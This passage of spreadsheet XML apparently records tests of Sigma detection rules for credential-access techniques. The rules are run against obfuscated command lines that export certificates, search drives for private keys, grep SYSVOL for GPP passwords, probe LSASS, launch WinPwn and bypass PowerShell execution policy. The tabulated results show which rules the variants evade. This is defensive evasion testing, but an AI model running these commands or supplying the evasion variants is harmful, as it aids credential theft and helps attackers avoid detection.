        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D489" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E489" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Get-ChildItem -Path Cert:\CurrentUser\My | Export-PfxCertificatet-FilePath C:\\temp\\cert.pfx\"</t>
        </is>
      </c>
      <c r="F489" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G489" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H489" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I489" s="43" t="inlineStr">
        <is>
          <t>Private Keys Reconnaissance Via CommandLine Tools (213d6a77-3d55-4ce8-ba74-fcfef741974e)</t>
        </is>
      </c>
      <c r="J489" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K489" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="490" ht="15.75" customHeight="1" s="42">
      <c r="A490" s="43" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B490" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C490" s="43" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D490" s="43" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E490" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmAND "Get-ChildItem -Path Cert:\CurrentUser\My | Export-PfxCertificatet-FilePath C:\\temp\\cert.pfx\"</t>
        </is>
      </c>
      <c r="F490" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G490" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H490" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I490" s="43" t="inlineStr">
        <is>
          <t>Private Keys Reconnaissance Via CommandLine Tools (213d6a77-3d55-4ce8-ba74-fcfef741974e)</t>
        </is>
      </c>
      <c r="J490" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K490" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="491" ht="15.75" customHeight="1" s="42">
      <c r="A491" s="43" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B491" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_private_keys_recon</t>
        </is>
      </c>
      <c r="C491" s="43" t="inlineStr">
        <is>
          <t>Private Keys Reconnaissance Via CommandLine Tools</t>
        </is>
      </c>
      <c r="D491" s="43" t="inlineStr">
        <is>
          <t>213d6a77-3d55-4ce8-ba74-fcfef741974e</t>
        </is>
      </c>
      <c r="E491" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c d^ir c:\ /b /s .key</t>
        </is>
      </c>
      <c r="F491" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G491" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H491" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I491" s="43" t="inlineStr">
        <is>
          <t>Private Keys Reconnaissance Via CommandLine Tools (213d6a77-3d55-4ce8-ba74-fcfef741974e); File And SubFolder Enumeration Via Dir Command (7c9340a9-e2ee-4e43-94c5-c54ebbea1006)</t>
        </is>
      </c>
      <c r="J491" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K491" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="492" ht="15.75" customHeight="1" s="42">
      <c r="A492" s="44" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B492" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_private_keys_recon</t>
        </is>
      </c>
      <c r="C492" s="44" t="inlineStr">
        <is>
          <t>Private Keys Reconnaissance Via CommandLine Tools</t>
        </is>
      </c>
      <c r="D492" s="44" t="inlineStr">
        <is>
          <t>213d6a77-3d55-4ce8-ba74-fcfef741974e</t>
        </is>
      </c>
      <c r="E492" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "gci -Path C:\ -Recurse -Include *.key"</t>
        </is>
      </c>
      <c r="F492" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G492" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H492" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I492" s="43" t="n"/>
      <c r="J492" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K492" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="493" ht="15.75" customHeight="1" s="42">
      <c r="A493" s="43" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B493" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_private_keys_recon</t>
        </is>
      </c>
      <c r="C493" s="43" t="inlineStr">
        <is>
          <t>Private Keys Reconnaissance Via CommandLine Tools</t>
        </is>
      </c>
      <c r="D493" s="43" t="inlineStr">
        <is>
          <t>213d6a77-3d55-4ce8-ba74-fcfef741974e</t>
        </is>
      </c>
      <c r="E493" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "dir"" c:\ /b /s .key</t>
        </is>
      </c>
      <c r="F493" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G493" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H493" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I493" s="43" t="inlineStr">
        <is>
          <t>File And SubFolder Enumeration Via Dir Command (7c9340a9-e2ee-4e43-94c5-c54ebbea1006); File And SubFolder Enumeration Via Dir Command (7c9340a9-e2ee-4e43-94c5-c54ebbea1006)</t>
        </is>
      </c>
      <c r="J493" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K493" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="494" ht="15.75" customHeight="1" s="42">
      <c r="A494" s="44" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B494" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_private_keys_recon</t>
        </is>
      </c>
      <c r="C494" s="44" t="inlineStr">
        <is>
          <t>Private Keys Reconnaissance Via CommandLine Tools</t>
        </is>
      </c>
      <c r="D494" s="44" t="inlineStr">
        <is>
          <t>213d6a77-3d55-4ce8-ba74-fcfef741974e</t>
        </is>
      </c>
      <c r="E494" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; {Get-ChildItem"" -Path C:\ -Filter *.key}"</t>
        </is>
      </c>
      <c r="F494" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G494" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H494" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I494" s="43" t="n"/>
      <c r="J494" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K494" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="495" ht="15.75" customHeight="1" s="42">
      <c r="A495" s="43" t="inlineStr">
        <is>
          <t>t1552.006</t>
        </is>
      </c>
      <c r="B495" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_gpp_passwords</t>
        </is>
      </c>
      <c r="C495" s="43" t="inlineStr">
        <is>
          <t>Findstr GPP Passwords</t>
        </is>
      </c>
      <c r="D495" s="43" t="inlineStr">
        <is>
          <t>91a2c315-9ee6-4052-a853-6f6a8238f90d</t>
        </is>
      </c>
      <c r="E495" s="43" t="inlineStr">
        <is>
          <t>findstr /S "cpass""word" \THAIMX\sysvol\*.xml</t>
        </is>
      </c>
      <c r="F495" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G495" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H495" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I495" s="43" t="n"/>
      <c r="J495" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K495" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="496" ht="15.75" customHeight="1" s="42">
      <c r="A496" s="44" t="inlineStr">
        <is>
          <t>t1552.006</t>
        </is>
      </c>
      <c r="B496" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_gpp_passwords</t>
        </is>
      </c>
      <c r="C496" s="44" t="inlineStr">
        <is>
          <t>Findstr GPP Passwords</t>
        </is>
      </c>
      <c r="D496" s="44" t="inlineStr">
        <is>
          <t>91a2c315-9ee6-4052-a853-6f6a8238f90d</t>
        </is>
      </c>
      <c r="E496" s="43" t="inlineStr">
        <is>
          <t>findstr /S cpassword \THAIMX\sysvol\..\sysvol\*.xml</t>
        </is>
      </c>
      <c r="F496" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G496" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H496" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I496" s="43" t="inlineStr">
        <is>
          <t>Findstr GPP Passwords (91a2c315-9ee6-4052-a853-6f6a8238f90d)</t>
        </is>
      </c>
      <c r="J496" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K496" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="497" ht="15.75" customHeight="1" s="42">
      <c r="A497" s="43" t="inlineStr">
        <is>
          <t>t1552.006</t>
        </is>
      </c>
      <c r="B497" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_gpp_passwords</t>
        </is>
      </c>
      <c r="C497" s="44" t="inlineStr">
        <is>
          <t>Findstr GPP Passwords</t>
        </is>
      </c>
      <c r="D497" s="44" t="inlineStr">
        <is>
          <t>91a2c315-9ee6-4052-a853-6f6a8238f90d</t>
        </is>
      </c>
      <c r="E497" s="43" t="inlineStr">
        <is>
          <t>findstr /S cpassword \THAIMX\SYSVOL\*.xml</t>
        </is>
      </c>
      <c r="F497" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G497" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H497" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I497" s="43" t="inlineStr">
        <is>
          <t>Findstr GPP Passwords (91a2c315-9ee6-4052-a853-6f6a8238f90d)</t>
        </is>
      </c>
      <c r="J497" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K497" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="498" ht="15.75" customHeight="1" s="42">
      <c r="A498" s="43" t="inlineStr">
        <is>
          <t>t1552.006</t>
        </is>
      </c>
      <c r="B498" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_lsass</t>
        </is>
      </c>
      <c r="C498" s="44" t="inlineStr">
        <is>
          <t>LSASS Process Reconnaissance Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D498" s="44" t="inlineStr">
        <is>
          <t>fe63010f-8823-4864-a96b-a7b4a0f7b929</t>
        </is>
      </c>
      <c r="E498" s="44" t="inlineStr">
        <is>
          <t>findstr "ls""ass"</t>
        </is>
      </c>
      <c r="F498" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G498" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H498" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I498" s="43" t="n"/>
      <c r="J498" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K498" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="499" ht="15.75" customHeight="1" s="42">
      <c r="A499" s="43" t="inlineStr">
        <is>
          <t>t1552.006</t>
        </is>
      </c>
      <c r="B499" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_lsass</t>
        </is>
      </c>
      <c r="C499" s="44" t="inlineStr">
        <is>
          <t>LSASS Process Reconnaissance Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D499" s="44" t="inlineStr">
        <is>
          <t>fe63010f-8823-4864-a96b-a7b4a0f7b929</t>
        </is>
      </c>
      <c r="E499" s="44" t="inlineStr">
        <is>
          <t>findstr lsa*</t>
        </is>
      </c>
      <c r="F499" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G499" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H499" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I499" s="43" t="n"/>
      <c r="J499" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K499" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="500" ht="15.75" customHeight="1" s="42">
      <c r="A500" s="43" t="inlineStr">
        <is>
          <t>t1552.006</t>
        </is>
      </c>
      <c r="B500" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_lsass</t>
        </is>
      </c>
      <c r="C500" s="44" t="inlineStr">
        <is>
          <t>LSASS Process Reconnaissance Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D500" s="44" t="inlineStr">
        <is>
          <t>fe63010f-8823-4864-a96b-a7b4a0f7b929</t>
        </is>
      </c>
      <c r="E500" s="44" t="inlineStr">
        <is>
          <t>findstr /R "lsa[s][s]"</t>
        </is>
      </c>
      <c r="F500" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G500" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H500" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I500" s="43" t="n"/>
      <c r="J500" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K500" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="501" ht="15.75" customHeight="1" s="42">
      <c r="A501" s="43" t="inlineStr">
        <is>
          <t>t1555</t>
        </is>
      </c>
      <c r="B501" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C501" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D501" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E501" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c start "" "C:\Users\Public\WP.exe"</t>
        </is>
      </c>
      <c r="F501" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G501" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H501" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I501" s="43" t="n"/>
      <c r="J501" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K501" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="502" ht="15.75" customHeight="1" s="42">
      <c r="A502" s="43" t="inlineStr">
        <is>
          <t>t1555</t>
        </is>
      </c>
      <c r="B502" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C502" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D502" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E502" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c Start C:\Temp\WinPwn_Tool.exe -recon</t>
        </is>
      </c>
      <c r="F502" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G502" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H502" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I502" s="43" t="n"/>
      <c r="J502" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K502" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="503" ht="15.75" customHeight="1" s="42">
      <c r="A503" s="43" t="inlineStr">
        <is>
          <t>t1555</t>
        </is>
      </c>
      <c r="B503" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C503" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D503" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E503" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ep bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F503" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G503" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H503" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I503" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J503" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K503" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="504" ht="15.75" customHeight="1" s="42">
      <c r="A504" s="44" t="inlineStr">
        <is>
          <t>t1555</t>
        </is>
      </c>
      <c r="B504" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C504" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D504" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E504" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F504" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G504" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H504" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I504" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J504" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K504" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="505" ht="15.75" customHeight="1" s="42">
      <c r="A505" s="44" t="inlineStr">
        <is>
          <t>t1555</t>
        </is>
      </c>
      <c r="B505" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C505" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D505" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E505" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -fiLE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F505" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G505" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H505" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I505" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J505" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K505" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="506" ht="15.75" customHeight="1" s="42">
      <c r="A506" s="43" t="inlineStr">
        <is>
          <t>t1555</t>
        </is>
      </c>
      <c r="B506" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C506" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D506" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E506" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -eP bypass -fiLe C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F506" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G506" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H506" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I506" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J506" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K506" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="507" ht="15.75" customHeight="1" s="42">
      <c r="A507" s="44" t="inlineStr">
        <is>
          <t>t1555</t>
        </is>
      </c>
      <c r="B507" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C507" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D507" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E507" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -FilE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F507" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G507" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H507" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I507" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J507" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K507" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="508" ht="15.75" customHeight="1" s="42">
      <c r="A508" s="44" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B508" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C508" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D508" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E508" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c start "" "C:\Users\Public\WP.exe"</t>
        </is>
      </c>
      <c r="F508" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G508" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H508" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I508" s="43" t="n"/>
      <c r="J508" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K508" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="509" ht="15.75" customHeight="1" s="42">
      <c r="A509" s="43" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B509" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C509" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D509" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E509" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c Start C:\Temp\WinPwn_Tool.exe -recon</t>
        </is>
      </c>
      <c r="F509" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G509" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H509" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I509" s="43" t="n"/>
      <c r="J509" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K509" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="510" ht="15.75" customHeight="1" s="42">
      <c r="A510" s="43" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B510" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C510" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D510" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E510" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ep bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F510" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G510" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H510" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I510" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J510" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K510" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="511" ht="15.75" customHeight="1" s="42">
      <c r="A511" s="44" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B511" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C511" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D511" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E511" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F511" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G511" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H511" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I511" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J511" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K511" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="512" ht="15.75" customHeight="1" s="42">
      <c r="A512" s="44" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B512" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C512" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D512" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E512" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -fiLE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F512" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G512" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H512" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I512" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J512" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K512" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="513" ht="15.75" customHeight="1" s="42">
      <c r="A513" s="43" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B513" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C513" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D513" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E513" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -eP bypass -fiLe C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F513" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G513" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H513" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I513" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J513" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K513" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="514" ht="15.75" customHeight="1" s="42">
      <c r="A514" s="43" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B514" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C514" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D514" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E514" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -FilE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F514" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G514" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H514" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I514" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J514" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K514" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="515" ht="15.75" customHeight="1" s="42">
      <c r="A515" s="43" t="inlineStr">
        <is>
          <t>t1555.004</t>
        </is>
      </c>
      <c r="B515" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_vaultcmd_list_creds</t>
        </is>
      </c>
      <c r="C515" s="43" t="inlineStr">
        <is>
          <t>Windows Credential Manager Access via VaultCmd</t>
        </is>
      </c>
